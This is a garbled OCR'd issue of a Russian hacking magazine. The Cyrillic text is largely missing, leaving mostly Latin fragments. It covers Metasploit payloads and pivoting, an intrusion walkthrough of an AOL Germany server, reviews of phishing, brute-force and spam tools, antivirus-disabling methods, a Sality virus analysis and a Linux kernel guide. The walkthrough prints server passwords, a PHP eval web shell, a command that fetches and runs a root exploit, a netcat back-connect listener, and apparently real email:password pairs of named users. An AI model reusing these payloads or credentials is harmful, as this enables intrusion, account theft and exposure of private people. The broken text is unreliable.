msf> wmap_run -t
msf> wmap_run e
db_vulns, db_notes.
. setg.
WMAP (wmap_crawler) (wmap_proxy).
MSF scanner/http/sqlmap.
SQLmap. , ,
:). sqlmap.
sourceforge.net.
db_autopwn. MSF
:
-R , ;
-m .
:
!
.
/. ,
(JavaScript) . ,
User-Agent, .
,
, ,
. .

( )
.
, 192.168.0.102:
msf>
msf>
msf>
msf>
use server/browser_autopwn
set LHOST 192.168.0.102
set URI index.php
exploit -j
http://192.168.0.102/index.php
(. ).
VBA
EasyHack MSF,
exe- . , ,
. - :
msf> db_autopwn -t -p -m windows -R excellent
Win-.
, 3.3.1 Nexpose MFS
.
1. Nexpose:
msf> load nexpose
msf> nexpose_connect msf_user:pass@127.0.0.1
2. :
msf> nexpose_scan -R excellent -x 192.168.0.101
BROWSER_AUTOPWN
,
, ,
.
, HTTP-
. ,
, -
062
msfpayload windows/shell_bind_tcp LPORT=5555 V >

macros.vba
, ,
. VBA,
(MACRO CODE) ( >
:
msfconsol Tab, -h.
Ctrl+C, Ctrl+Z.
cygwin /
, Shift+Insert.
msfcli, msfpayload .. cygwin. ,
.
X 10 /141/ 10
INFO
info
, , .
,
MSF
netcat
metasploit:
offensive-security.
com/metasploitunleashed/
metasploit.com
VB),
(PAYLOAD DATA). - .
( OfficeXP,
), !
. ,
,
.
5555 .
(payload)
. MSF ,
( Win*), . -, ,
(ruby, perl).
:
Inline .
, ;
Stager , .
,
, ;
Ord . ,

DLL;
Bind ;
Reverse -;
Findport , , .
;
Findtag ,
4- .;
Exec, Download_exec, Up_exec
, / ;
Meterpreter :);
VNC VNC- ;
dllinjection DLL .
DLL ;
metsvc meterpreter ;
PassiveX ActiveX.
NoNX
DEP;
DNS , , IP;
HTTPS ,
HTTPS- (, ).
PassiveX, .
,
ActiveX, X 10 /141/ 10
Meterpreter
IE HTTP-. ,
, - ,
NAT , HTTP- -.
, .
(
) IE.

(192.168.0.102:443):
msfpayload windows/meterpreter/reverse_http
PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X >
reflmeter102.exe
msf> use exploit/multi/handler
msf> exploit -p windows/meterpreter/reverse_
http -o PXHOST=192.168.0.102,PXPORT=443,PXU
RI=/
, PassiveX IE6,
IE7/8.
. , ,
, meterpreter,
.
.
(192.168.0.101) 5678 .
063
WMAP . ,
:)

winenum.rb
MSF:
msf> use exploit/multi/handler
msf> exploit -p windows/shell_bind_tcp -o
RHOST=192.168.0.101,RPORT=5678
,
meterpreter, . MSF
meterpreter , , (
). . ,
(
), (, 1):
msf> setg LHOST 192.168.0.102
msf> setg LPORT 6666
msf> sessions u 1
.
, meterpretere.
(linux, Macos), - . , -,
: - meterpreter
PHP! -,
PHP, .
.
. MSF
, .
, :).
. MSF,
, 192.168.0.103:5555.
80 netcat:
ncat --sh-exec ncat 192.168.0.103 5555 l 80
--keep-open
payload IP ( DNS) .
, netcat SSL, ,
.
,
meterpreter. , meterpreter, -
064
, ( ,
chroot) ( -, , ,
) :).
,
(192.168.146.129) (192.168.0.102)
-.
(, , )
msfconsol:
msf>
route add 192.168.146.0 255.255.255.0 1
, nmap ,
. , ( - )
(. )
MSF.
( ),
, , meterpreter :
meterpreter> portfwd add -l 8008 -p 2222 -r
192.168.0.101
payload LHOST=192.168.146.129,
LPORT=8008, -.
Meterpreter -. .
msf3\scripts\meterpreter,
run Tab ( , :).
run, AutoRunScript
InitialAutoRunScript /. , .
, :
winenum ;
persistence, metsvc meterpreter
;
getcountermeasure , .
- ( ,
) , ,
, . ,
, ,
MFS, , , . ,
!z
X 10 /141/ 10

Anonymous
AOL
AOL
AOL
. :
AIM, AOL Mail ICQ, ,
,
aol.com (-50
). , ,
XSpider 7.7 AOL,
64.12.0.0 64.12.255.255. ...
DETECTED
,
, alex-aolde-mtc02.evip.aol.
com, http://
alex.aol.de .
, CMS Joomla
1.5.x.
, OWASP Joomla!
Security/Vulnerability Scanner YGN Ethical Hacker Group
( ).
, , :
C:/Perl/bin/perl5.12.1.exe C:/joomscan/joomscan.pl -u
http://alex.aol.de
066
:
* Deduced version range is : [1.5.12 1.5.14]
...
# 14
Info -> Core: Admin Backend Cross Site Request
Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in
and to be tricked into a specially crafted webpage.
Vulnerable? Yes
...
# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon
X 10 /141/ 10
!
...
var $secret = 'NAAgXewXco6BSw2d';

...
var $host = 'localhost';
var $user = 'alex';
var $db = 'test';
multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/
plugins/tinybrowser/
Exploit: While Joomla! team announced only File
Upload vulnerability, in fact there are many. See:
http://www.milw0rm.com/exploits/9296
Vulnerable? Yes
OWASP
,
, OWASP DirBooster (, , ).
, :
Target URL: http://alex.aol.de/;
Work Method: Auto Switch (HEAD and GET);
Number Of Threads: 200;
Select starting options: Standard start point, Brute
Force Dirs, Brute Force Files;
File extension: php.
, .
: ./info.php (phpinfo), ./pma (phpMyAdmin) ./dnld, (configuration.php, phpMyAdmin-3.3.2-english.tar,
wirwarendrin.tar).
80- wirwarendrin.tar ,
alex.aol.de wirwarendrin.
de, .
, ,
:).

configuration.php,
:
<?php
class JConfig {
X 09 /140/ 10
...
var
var
var
var
$smtpport
$smtpuser
$smtppass
$smtphost
=
=
=
=
'465';
'wirwarendrin';
'Briesben';
'smtp.aol.com';
...
var $password = 'wjedko,lg';
...
}
?>
wirwarendrin@aol.com, , , alex.aol.de.

phpMyAdmin, :).
alex, , ,
:
.
.

PasswordsPro, , , Joomla! md5($pass.$salt).
, http://forum.
antichat.ru/showthread.php?t=13640 PasswordsPro
d86f4c81342b79c4bab8868656c
abe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb, .
qwertyzuaor, alex.aol.de,
alex.aol.de/administrator.
, , alex.aol.de AOL
,
450 AOL,

:)
AOL INSIDE
:
Extensions Template Manager aol-exit Edit HTML,
/data/servers/wahl-o-mat_aol_de/pages/alex_aol_de/
templates/aol-exit/index.php.
:
067
Joomla!
<?php
eval(stripslashes($_REQUEST[aaa]));
?>
HTML-:
<form action="http://alex.aol.de/templates/aol-exit/
index.php" method="POST">
<input type="text" name="aaa"/>
<input type="submit" value="Pwn It!"/>
</form>
wget WSO-
(http://forum.antichat.ru/thread103155.html) templates
404.php
(, , ).
/data/servers alex.aol.de: editor.aol.fr, gat.aol.co.uk, sns.nexus.aol.com,

wahl-o-mat.aol.de, matrix.aol.de.
,
,
:
cd /data/servers;tar czvf /tmp/1.tgz ./*
, ,
, , :
Linux wahl-o-mat.aol.de 2.6.9-55.ELsmp #1 SMP Fri Apr
20 17:03:35 EDT 2007 i686
,
Back-connect 31337 WSO ( Network) NetCat:
c:/netcat/nc.exe -l -p 31337
,
http://www.exploit-db.com. , ,
wunderbar emporium (http://www.grsecurity.net/~spender/wunderbar_
emporium.tgz).
, , uid=0(root) gid=0(root) groups=11560(httpd):
wget http://www.grsecurity.net/~spender/wunderbar_
emporium.tgz;tar xzfv wunderbar_emporium.tgz;chmod
0777 ./*;./wunderbar_emporium.sh
-
. ifconfig ,
068
joomscan.pl
10.62.134.80.
rpm nmap:
rpm -vhU http://nmap.org/dist/nmap-5.21-1.i386.rpm
:
nmap -v -n -sS 10.62.134.0/24

AOL,
:
Nmap scan report for 10.62.134.89
Host is up (0.00013s latency).
Not shown: 986 closed ports
PORT
STATE SERVICE
22/tcp
open ssh
80/tcp
open http
135/tcp open msrpc
445/tcp open microsoft-ds
1024/tcp open kdm
1041/tcp open unknown
1051/tcp open optima-vnet
1311/tcp open rxmon
2103/tcp open zephyr-clt
2105/tcp open eklogin
3389/tcp open ms-term-serv
MAC Address: 00:18:8B:74:52:6E (Dell)
...
Nmap scan report for 10.62.134.96
Host is up (0.00013s latency).
Not shown: 971 closed ports
PORT
STATE SERVICE
22/tcp
open ssh
88/tcp
open kerberos-sec
135/tcp
open msrpc
139/tcp
open netbios-ssn
389/tcp
open ldap
445/tcp
open microsoft-ds
464/tcp
open kpasswd5
593/tcp
open http-rpc-epmap
636/tcp
open ldapssl
1024/tcp open kdm
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1112/tcp open msql
X 10 /141/ 10
INFO
info

./dnld
backconnect WSO-
1311/tcp open rxmon

2103/tcp open zephyr-clt
2105/tcp open eklogin
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-term-serv
13722/tcp open netbackup
MAC Address: 00:13:72:5A:3E:78 (Dell)
, AOL
:).
AOL CONFIDENTIAL

AOL
.
, PasswordsPro alex.aol.de.
, 450 ,
197.

.
:
guenterstaar guenterstaar@aol.com:keiness
thomaskuck thomaskuck@aol.com:sascha
mdfreedom99 marcdrewello@aol.com:Magic23
ClaudiaLangwald ClaudiaLangwald@aol.
com:Silvera
bettyvonloesch bettyvonloesch@aol.com:hanne
Pierre PierreBeneHH@aol.com:wombast
Tenge Tenge@aol.com:derwis
JennySefkow JennySefkow@aol.com:varita
NinaRixenHH@aol.com NinaRixenHH@aol.
com:brauere
Jennifer2706 jennifermatheja@aol.com:elite15
A.V.aus H. voigthh@googlemail.com:Delphines
fkorupp frederickorupp@googlemail.
X 10 /141/ 10
com:wasistdas
KrassowskiSabine@aol.de KrassowskiSabine@
aol.de:Sommer44
neddie annettharksenhh@aol.de:hochzeis
Trixi seebertrixi@aol.de:sommer07
tringasvassiliki tringasvassiliki@aol.
de:perikle
AgnesAB agnesboltzenhh@aol.de:April2008
, :).

: ,
, , , , ebay paypal (!),
.
Company Confidential.
AOL Germany SNAPSHOT SUMMARY as of COB
Date : [2006-02-11]
Business :
AOL
GERMANY (AOL)
FOR [2006-02-11]
-Ending Members 2,687,173
-Registrations 1,824
-Reactivations 146
-Overhead Conversions 1
-Cancellations 1,472
-Terminations 549
-Net Change -50
-Customer Hours 7,301,418
-Total Hours 7,322,081
,
2006-02-11 :).

,

.htaccess
Options
+Indexes.

,

: Order Deny,
Allow
Deny from all
HTTP://WWW
links
http://yehg.net/lab/
pr0js/files.php/joomscan.pl Joomla!
Security/Vulnerability
Scanner
http://www.owasp.
org/index.php/
Category:OWASP_
DirBuster_Project
OWASP DirBuster
Project
http://www.
insidepro.com/eng/
passwordspro.shtml
PasswordsPro
http://www.webhack.ru/download/?
case=info&go=
100 NetCat

, -
.
: ,
phpMyAdmin' ,
,
.
, AOL :).!z
069

icq 884888
X-TOOLS

: RemCam 2
:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: redsh
:
- ( 180,5 );
- .

? ,
.
,
, RemCam 2,
/-!
:
- -;
- (, );
- RGB,
YUV, JPEG - (BI_RGB, YUY2,
UYVY, NV12, YV12, I420, Y8, MJPG,
);
-
-
;
- JPEG
;
-
( ,
);
- IMA
ADPCM;
-
;
- ZLIB- ;
-

;
- ( md5-
);
070
,
,
redsh.ru/board.
php?feed=programs&id=20 (

RemCam 2).
: aNYfAKE
: *nix/win
: b00zy_c0d3r and The Mafia
,
.

: PHP, fopen, ,
:).
:
1. , ;
2.
;
3. ;
4. ;
5. ,
.

.
:
Fake host (
http://
www.mail.ru, mail.
ru);
Fake path
( -
http://somesite.
ru/adminka/, /
adminka/,
, /);
Fake script
( http://somesite.ru/adminka/
loginhere.php, loginhere.php);
Redirect ,

;
Log type (mail
file);
Email
, ;
File
.

,
http://forum.xeka.ru/
showthread.php?t=142.
: VK Regger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: 0pTik

,
.
:
- ( 10
-);
-
;
-
;
- ;
-
antigate;
- ;
- HTTP Proxy, Socks4,
Socks5;
- 98%.
,

,

, .
: http://forum.antichat.
ru/thread219834.html.
X 10 /141/ 10
, ,
, ( )
Start. ! :)
: ArxFinder
Vista/2008 Server/7
: ArxWolf
: VkFunAdder 0.3
Vista/2008 Server/7
: IOFFE

,
?

(
). VkFunAdder
. ,

:
-
mail:password;
- antigate
;
- ;
- ;
- ;
- .
, ,
,
200 .
P.S.
: http://forum.antichat.ru/
threadnav207277-1-10.html.
: ICQ Light Spam

Vista/2008 Server/7
: q1w2e3

ICQ-,
- - :)
, ICQ Light Spam
-
ICQ. :
X 10 /141/ 10
ICQ-
-
;
-
4000;
- ;
- ;
- ;
- ;
-
;
- ;
- .NET Framework 3.5.

,
!
: ASR Brute
Vista/2008 Server/7
: q1w2e3

q1w2e3,
. , ASR Brute (Answer Secret
Rambler Brute)
Rambler.ru (
,
?). :
- ;
- ( 50
10 );
- ;
-
good.txt;
- bad.txt;
-
dict.txt;
- .

dict.txt,

webxakep.net, ArxFinder
. :
- ;
- + ( 1 100);
- ;
- ( 1 );
- (
30000 15-20%);
- ( 30000
14 );
- , ;
- ;
-
;
- ,
;
-
,
(
);
- ;
- ( );
- Windows
7 Ultimate, Windows 7 Maximum,
Windows Vista Windows XP.
,
/
// ,

ArxFinder.
P.S.
http://webxakep.net/forum/
showthread.php?t=7693.z
071
MALWARE
deeonis deeonis@gmail.com
Nod32, Avast, Avira:

-
, - .
? ?
? ,
. . ,
:).
-
.
ESET
NOD32 4.2.

, , ,
, ,
- .

,
, HIPS (Host Intrusion Prevention System)
.

avast! Free Antivirus.
, ,
072
.
, avast!
Intelligent Scanner,
,
( ,
P2P/ ..).
, , ( ) ,
-, Avira AntiVir Personal.
,

, , ,
Backdoor-, , , ..
,
. ,
.
,
Windows.
Windows XP
Professional SP3.

. ,
.
.
-, X 10 /141/ 10
NOD32.
.
.
,
.
, .
- ,
.
.

. ,
API-.
,
, ,
. -
, , API- .
,
Windows, . ,
. ,
,
.
, , -
, ,
, .

. ,
.
MoveFileEx; .
NULL, MOVEFILE_DELAY_UNTIL_REBOOT, ,

-, .
, .
, .
NOD32 ,
: egui.exe ekrn.exe. , . -
. ,
.
. , , NOD32
.
X 10 /141/ 10
Avira
.
avast avastsvc.exe avasrui.exe,
Avira AntiVir avgnt.exe, avguard.exe, avshadow.exe. ,
... . ,
. ,
, .
.
- , -
. .
, . ,
. ,
, .
. , , . NOD32
exe. .
avast! Free Antivirus Avira AntiVir Personal, ... ,
. . .

, .
MoveFileEx
ESET NOD32
1
2
3
4
5
6

5
5
5
3
2
3
3.8
avast!
Free
Antivirus
5
5
5
3
5
5
4.7
Avira
AntiVir
Personal
5
5
5
3
4
3
4.2
073
MALWARE
avast!
Avira AntiVir Personal

MOVEFILE_DELAY_UNTIL_REBOOT, . , ,
,
.
NOD. ,
, .
. .
. Windows
, , ,
- . ,
, ,
,
.
.
- ,
.
, .
, , Safe mode ,
.
,
.
, ,

,
, , . , ,
, , 95% . ,
100 , ,
, , ,
( ). ?
, . -
, 1,5k
.
?
, , , HIPS' ,
, . ,
.
074
XP. Welcome
, ,
NOD32. . , .
, Avira AntiVir.
, .
, , . , avast!,
Avira, .
,
? , - ,
.
.
Windows XP Professional. ... : gpedit.msc. .

User Configuration, Administrative Templates, System.
Don't run specified Windows applications.
,
. NOD32.
: egui.exe ekrn.exe.
, . OK
. , .
, , ... , ,
. ? .
, ekrn.exe - ,
. .
. . , NOD
, ,
, . Avira
AntiVir. . .
, -
.
,
Malware
, , . ,

, . ,
,
. , ( ) ,
, .
.
X 10 /141/ 10
avast! Antivirus Free

. , .
,
.
. NOD32. NOD
.
, :

msiexec /quiet /uninstall {1A59064A-12A9-469F-99F604BF118DBCFF}
, GUID.
. ,
!
avast! Free Antivirus .
:
C:\Program Files\Alwil Software\Avast5\aswRunDll.exe
"C:\Program Files\Alwil Software\Avast5\Setup\setiface.
dll" RunSetup.
.
,
(. ).
avast . Avira
AntiVir Personal?

. , ,
- , ? . ,
, .
, .
,
. ,
, . NOD32,
,
. Windows.
X 10 /141/ 10
,
UI,
.
. ,
: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.
ekrn.exe, ekrn,
.
Del Access denied.
.
UI-. HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
, egui.exe.
, .
NOD . ,
. ESET NOD32 .
avast.
, NOD. ,
, . ,
, UI- . . Avira AntiVir ,
NOD32 ,
, ,
. .
. , ,
. avast! Free Antivirus
4,7 . Avira AntiVir Personal 4,2 .
ESET NOD32 3,8 . , . , ,
. z
075
MALWARE
,

FakeAPI
Header
Header
PE Virus.Win32.Sality.aa
-:
SALITY.AA

, Virus.Win32.Sality.aa.

FakeAPI .
. , , x86- , , ModRM,
SIB, ,

, .

.
076
.
Virus.Win32.Sality
a 2003 ,
, aa
2008 . ,

.
Virus.Win32.Sality.aa

.

. PE-,
, BackDoor.

.
,
, API-.
X 10 /141/ 10

, , ,
,
, , -,
-.
,
,
0x3000x400 .
, , , FakeApi
. ,
, PoC
(Proof of Concept) .
EPO (Entry Point Obscuring)
Virus.Win32.Zombie.
. .
Sality ,
, , .
.
,
.
,
.
. ,
, . . , , .
PE- Virus.Win32.Sality.aa
. ,
.
? :
, ,

API
,
.
,
.
,
. , . .
, -
.
API- . -
.
, Sality , .
, .
X 10 /141/ 10
. , ,
. ,
. .
:
;
VA ;
VA ;
VA.
, , Sality .
PUSHAD CALL. PUSHAD ,
,
, ,
POPAD,
. CALL,
, (VA) . ,
. .
( , ,
, ):
POP REG;
SUB REG, IMM;
MOV REG, [ESP];
ADD REG, IMM;
ADD [ESP], IMM;
POP REG;
REG 32- , IMM

.
() - (,
REG Sality ):
JMP REG;
CALL REG;
PUSH REG;
RETN;
,

.
, .
,
:
.
, , , ,
. , .
.
,
,
, :
(- -
);
077
MALWARE
.
ModRM;
;
.
2 4 . , ModRM . .
. ,
, , ModRM. , , Mod 3
LEA. ,
x86, Intel, IA-32 Intel Architecture
Software Developers Manual, 2.
X86
, .
, - .

. ? !
. , ,
EAX 0. :
PUSH 0; POP EAX;
XOR EAX, EAX;
MOV EAX, 0;
AND EAX, 0;
,
.
, , ,
. :
PUSHAD; NOP; NOP; NOP; NOP; POPAD; ADD EAX, 0xFFEEFFEE;
INC EAX; OR EAX, EAX; SUB EAX, 0xFFEEFFEF; PUSH EBX; PUSH
0Fh, .
, .
. ,
0B8h MOV eAX, lz, ,
. ,
B8 FF FF FF FF MOV EAX, 0FFFFFFFFh. , , , PUSH EBP 55h, PUSHAD 60h. ,
ModRM.
FakeAPI API,
,

, : Mod, Reg/
Opcode, R/M. Mod , .
3, , . R/M Reg/Opcode .
, , 0x80, 0x81, 0xC1, Reg/Opcode
, .
Mod 3, R/M 4,
SIB. .
, . : ADD EAX, [EAX + ECX*4 + 600].
,
. .
. . :
ECX; POP ECX; POP EBX; LEA EAX, [EAX]; MOV EDX, EDX;

, ,
.
078
F0 Lock; F2 REPNE; F3 REP; 2E CS segment

override; 36 SS // // -; 3E DS // // -; 26 ES
// // -; 64 FS // // -; 65 GS // // -; 66
Operand Size; 67 Address Size;
X 10 /141/ 10
Intel , , , .
, ,
. REPNE/REP
,
, SCASB, MOVSD, LODSW.

, .
Sality? -,
, .
PUSH POP. ,
Mod 3,
, . LEA, Mod 2, 3
. -,
, - : SHLD, BSF,
BTS, BTC, XADD . Sality 66h,
REPxx .
, ,
.
, , .
. Sality . Intel
:
Repeat prefixes (F2H, F3H) cause an instruction to
be repeated for each element of a string. Use these
prefixes only with string instructions (MOVS, CMPS,
SCAS, LODS, STOS, INS, and OUTS). Use of repeat
prefixes and/or undefined opcodes with other IA32 instructions is reserved; such use may cause
unpredictable behavior.
, F2 F3
,
CALL, SHL, TEST
. .

. Sality 64h X 10 /141/ 10
x86
CALL. , !
? , , ,
.
,
, .
. , , ,
,
.

FakeAPI.
.
API-, ,
. FindCl ose GetModuleHandleA.

. -,
EAX ,
, .
-, FindClose
, FindFirstFile.
FindClose (0) ,
. ,
FakeAPI ,
, API-,

.
,
. , Sality
. , ,
. FakeAPI
. , ,
, . ,
, , ,
. z
079

Mifrill mifrill@real.xakep.ru
IT-
Parallels
IT .

,
: ABBYY, Parallels.
,
, , , Parallels,
.
Parallels
. ,

.
, ,
.
( Parallels)

.
,
, , , 20 ,
50 .
,
, ;
:
,

- ().

080
074
, 1992
,
.

. , ,
(, , ..).

-
. ,
, .
, ,
,
, . ,
,
,

:
.

, ,
.
1994, -
,
,
.
, Standard
& Western.
Standard & Western
, ,
- .

,
S&W
. ,

S&W

Rolsen. ,
, .
, ,
, .
-
90- , ,
, .
X 10 /141/ 10
PARALLELS DESKTOP

, Rolsen
Electronics .
. - ,
,
,
16 ERP-.
,

60 S&W
,

Solomon.
S&W ,
, ,
,
:
Parallels 30 55 .
Parallels 500 , , Microsoft, Apple, Intel,
AMD, Dell, HP IBM.
Parallels , , , .
1 . .
Parallels 10 . 125 .
90% 98% Parallels .
Parallels 60%
, 30%, 3%.
Parallels Desktop Mac, , Mac 1
. 2,5 . .
Solomon Software.
,

. ,
,
- , ,

.

.
X 10 /141/ 10
. ,
,
,
, ,
, . ,
. ,

, , ,
.

, ,
, , ,
.
. Solomon

.
:
,
?.
, Standard & Western
,

. , Solomon
Software , . S&W
,
- ERP- Solomon,
.
,
- ;

Pervasive,
Solomon. Standard
& Western
,
.
(-
)
,
Parallels .
,
081
PARALLELS
SUMMIT 2009
,
, ,
. , , , ,
, .
CNEWS AWARD
, ,
1975 ,
. 80- ,
, (
4- ) -
, ,
.
,
,
.
, .
, 14
,
. ,

.
. ,
, (),
, ,
.
,
, Siemens,
, .
-,
.
.
, -
082
,
,
, .
.
,
,
. .
, .
, ,
. :
-
.
Parallels,
( ,
).
,
,
. ,
, ,
. 2000 ,
,
, IBM,
. ,
,
.
,
Parallels ,
, ,
(
15 ). , ,

. , ,
,
700
.

?
,

, ,
,
,
.
, Standard &
Western , 90- ,
. - ,
2000 ,

Solomon Software,
.
, Standard & Western
Software SWsoft.
:
-, Standard & Western
Standard investment, -,
.
,
, ,
dot-com bubble.
, IT- ,
X 10 /141/ 10
.

, SWsoft , .
,

.

,
,
.

SWsoft. ,
, ,
,
. , , ,
(
,
, , -
, -
,
. , , (
,
, , ,
$300 ), SWsoft
.

, .

, ,
.
,
SWsoft
ASP-.
,
,
,
SWsoft.
,
Acronis
). ?..
, ,
. ,
.
,
Microsoft ,
. ,

, , , Linux ASP
(Application Service Providers). ,
,
, - . ,
, , ,
,
ASP
(Application service providers).
SaaS software as a service
.

VMware.

. ,

, - .
,
, SWsoft .
,
X 10 /141/ 10
( Parallels Virtuozzo Containers),

Acronis. ,

IT.

- ,
. , ,
- ...
, ,
SWsoft, . ,
. - Virtuozzo Containers,

,
.
-,
:).

,
, -
. , ,
, SWsoft

( ,
, , ,
). ,

.

, Parallels
.
( ) ,
, ,
- . ,
-
,
, Parallels (
), , . ,
, ,

.
,
. ,
,
, ,
.
, . 2003 .
2004 ,
,
. ,

...
, , . ,
, - , ,
SWsoft Parallels .
SWsoft .

Unix, SWsoft,
Parallels -
R&D .

Parallels .

,
, Parallels .
,
Parallels

083
SWsoft,

. .
Parallels SWsoft,
.
,

? , , ,
.

.
,
,

,
. ,

Parallels . ,

, , :).
,
. 2005 -
Windows, 2006,
,
Parallels Desktop Mac.
, , 2006 ,
Apple Intel,
.
.
,
, . -
084
Parallels Desktop Mac

3,5 .
, Apple
BootCamp,
Windows,
Mac OS. , .

- ,
Mac OS,
. ,

Parallels - -
,
.
( ,
)
Parallels .
2005 ,
SWsoft,

: Bessemer
Venture Partners, Insight Venture Partners
Intel Capital.

, , - .
2003 SWsoft
Plesk Inc.
, , , . Plesk
,

( Parallels Plesk Panel).

Parallels
Virtuozzo Containers, Parallels Workstation,

Parallels Server Mac,
Parallels Desktop
Mac. 2008 Parallels SWsoft,

. -

, ,

.
Parallels , ,
.
,
, . Parallels
,
, - ,
.
- Parallels
,
Parallels ,
.
, Parallels

,
. ? Parallels
, ,
,
,
,
. Parallels
,
.
Parallels
. z
X 10 /141/ 10
PARALLELS

. ,
iPhone Mac. . ,
, . - , , ..
.
-
,
VMware ?
. .

. , ,
. , ,
, BIOS. , .
, . ,
Intel Pentium
.

,
,
.
Parallels Desktop for Mac for Windows Linux ,

, ?
.
,
. ,
. ,
, .
, , :
( - )?
, .
. . , -
. ,
X 10 /141/ 10
, , , . /
, ?
, ,
, - .
. ,
- - .
, ,
. ,
,
. .
- ,
. , - , .
, SmartSelect,
Word-
Windows.
, , Word, ,
,
. . ,
SmartSelect,
SharedFolders, SharedProfiles Coherence. , , -
,
.
085
UNIXOID
Adept adeptg@gmail.com
Linux,
,
Linux
.
.
.

()
, kernel.org, .
2.4.x
( )
( :) )
2.6.x.
-rc, git' rc-git.
7-9 rc-,
. , 4-5 ,
2.6.35.
LINUX-RT
, .
Linux
.
,
086
. , ,

-
.

highload-. ,
, .
www.kernel.
org/pub/linux/kernel/projects/rt/.
2.6.33.6-rt27.
realtime-
. , Ubuntu rt-
Processor type and features

Preemption Mode (Complete Preemption
(Real-Time)). Kernel hacking Check for stack
overflows, .
, : Kernel hacking
Tracers > Kernel Function Tracer, Interrupts-off
Latency Tracer, Interrupts-off Latency Histogram,
Preemption-off Latency Traver, Preemption-off
Latency Histogram, Scheduling Latency Tracer,
Scheduling Latency Histogram, Missed timer
offsets histogram.
PREEMPT RT, :
$ sudo apt-get install linux-rt

.
-
$ uname -v
#1 SMP PREEMPT RT Wed Aug 4 00:40:34
YEKST 2010
X 10 /141/ 10
HTTP://WWW
links
grsecurity
reiser4, reiser4progs.
:
:)
,
:
# echo 1 >/sys/kernel/debug/tracing/latency_
hist/enable/wakeup
:
$ grep -v " 0$" /sys/kernel/debug/tracing/
latency_hist/wakeup/CPU0
: ,
.
BFS
-
(, ) Linux. BFS
(Brain Fuck Scheduler), CFS , , ( ,
BFS
, , , ,
, , ,
). :
www.kernel.org/pub/linux/kernel/people/ck/patches/2.6.
( 2.6.34-ck1) General Setup BFS cpu scheduler.
REISERFS
,
. , ,
. Reiser4 .
(reiser4-for-2.6.34.patch.gz)
: ftp://ftp.kernel.org/pub/linux/kernel/
people/edward/reiser4/reiser4-for-2.6.
File Systems Reiser4.
.
X 10 /141/ 10
kernelnewbies.org
lkml.org

Linux Kernel Mailing
List
liquorix.net
Debian-
,

zen-kernel
grsecurity.net
ccache.samba.org
zen-kernel.org
ksplice.com
$ sudo apt-get install reiser4progs
, :
mkfs.reiser4 reiser4;
fsck.reiser4 reiser4;
measurefs.reiser4
reiser4.
GRSECURITY
,
Linux-.
grsecurity Security options
Grsecurity. : ,
. ,
-
. :
FIFO
( FIFO),
;
* dmesg , root,
;
chroot

chroot.
:
, chroot: mknod (
,
), chroot, sysctl
;
/proc ,
( wheel);
/dev/kmem, /dev/mem /dev/port;
;
( fork(),
, SIGSEGV ).
,
:
/proc /proc
. GID ,
/proc.
chroot: suid,
INFO
info
fakeroot

.

,
sudo.
BFS

Android.
hackbench
(developer.osdl.org/
craiger/hackbench/
src/hackbench.c)

BFS.

.
Kernel Check
(kcheck.sf.net)
python'
,

deb ,
.
087
UNIXOID
ksplice.com. rebootless
nconfig menuconfig
,
, ;
( mount/
umount);
;
( root
).
Security Level
. Custom,
. , Grsecurity Sysctl
support, /
sysctl .
,
.
/
RBAC (Role Based Access Control)
.
gradm2, :
!
, production-,
24x7. ,
secutity-update , .
downtime . .
. :
, , ksplice.com .

uptrack.
# uptrack-upgrade
! , uname -a .
# uptrack-show
.
-, ,
e-mail . rebootless
, , $3,95 ( 20, $2,95).
30 . .
, ,
.
088
$ sudo apt-get install gradm2
ZEN-KERNEL
Zen-kernel ,
. . zenkernel :
( 2.6.34-zen1);
git';
.
: zen-stable.git ( ,
) zen.git ( git-
).
:
( BFS);
Reiser4;
Linux-PHC , CPU
;
( Lenovo ThinkPad SL,
Gamecube/Wii, Macbook, WiFi- );
Tuxonice , hibernate (
,
);
FatELF ,
( Universal Binary Mac OS X);
DazukoFS , on access
. .

, , .
Ubuntu, .
( ),

:
$ sudo apt-get install linux-source
zen-kernel , generic-
ubuntu, . ,
:
$ sudo apt-get install build-essential libncurses5-dev \
libgtk2.0-dev libglade2-dev libqt3-mt-dev git-core
src,
/usr/src:
X 10 /141/ 10
reiser4
$ sudo usermod -a -G src adept
git- ( 500 ):
$ cd /usr/src
$ git clone git://zen-kernel.org/kernel/zen-stable.git
linux-2.6-zen
, :
$ git tag # ,
:
$ git checkout v2.6.34-zen1
git.
, . :
$ cd /usr/src/linux-2.6.34
$ zcat ../patch-2.6.35.bz2 | patch -p1
patch '--dry-run', X 10 /141/ 10
, , .
:
make config , .
( );
make allnoconfig/allyesconfig ,
no/yes;
make defconfig ;
make randconfig ;
make oldconfig .
, ;
make menuconfig , ncurses,
;
make nconfig 2.6.35. , ncurses, ,
, menuconfig;
make xconfig QT;
make gconfig GTK.
menuconfig.
-

. :
, ( ,
/) , . , . ,
, , .
089
UNIXOID
EXPERIMENTAL . Device
Drivers Staging Drivers.
.
,
General Setup Local Version.
. , ( .config),
:
$ make
-j , .
,
. :
$ sudo make modules_install
$ sudo make install
/lib/modules/,
/boot. initrd :
-
-
- . , , .
ccache, .
.
ccache
$ make CC="ccache gcc" CXX="ccache g++"
~/.ccache,

$ ccache -s
090
$ sudo update-initramfs -k v2.6.34-zen1 -c
grub, :
$ sudo update-grub
, , , .
. DEBIAN-WAY
, . ,
,
,
.
Debian/Ubuntu make-kpkg. ,
make-kpkg, :
$ sudo apt-get install kernel-package
, ,
:
$ fakeroot make-kpkg --initrd --revision=mykernel \
kernel_image kernel_headers modules_image
, : linuximage-version-revision.deb ( ) linux-headersversion-revision.deb ( ), /
usr/src. , , :
$ sudo dpkg -i /usr/src/*.deb
$ sudo reboot
MAKE COMPLETE
, ,
.
OpenVZ Xen, Openwall, ( ).z
X 10 /141/ 10
UNIXOID
zobni n@gmail.com
100

Linux-
UNIX- .
, ,

,
. ,

? ,
.

,
.
, ,
:
1. -.
. , ,
, ,
